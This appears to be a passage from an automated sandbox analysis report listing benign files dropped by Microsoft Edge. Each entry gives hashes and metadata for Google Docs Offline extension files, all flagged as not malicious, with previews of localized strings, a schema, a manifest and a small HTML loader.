                                                                                                                                                                                                                                                                                                                            SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2846
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                                                            MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                                                            SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                                                            SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                                                            SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):934
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                                                            MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                                                            SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                                                            SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                                                            SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):963
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                                                            MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                                                            SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                                                            SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                                                            SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1320
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                                                            MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                                                            SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                                                            SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                                                            SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):884
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):980
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wuser popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1941
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1969
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1674
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1063
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1333
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                                                            MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                                                            SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                                                            SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                                                            SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1263
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                                                            MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                                                            SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                                                            SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                                                            SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1074
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                                                            MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                                                            SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                                                            SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                                                            SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):879
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                                                            MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                                                            SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                                                            SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                                                            SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1205
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                                                            MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                                                            SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                                                            SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                                                            SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):843
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                                                            MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                                                            SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                                                            SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                                                            SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):912
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                                                            MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                                                            SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                                                            SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                                                            SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):11406
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                                                                            MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                                                                            SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                                                                            SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                                                                            SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):854
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                                                            MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                                                            SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                                                            SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                                                            SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2525
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                                                                            MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                                                                            SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                                                                            SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                                                                            SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):97
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                                                            MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                                                            SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                                                            SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                                                            SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
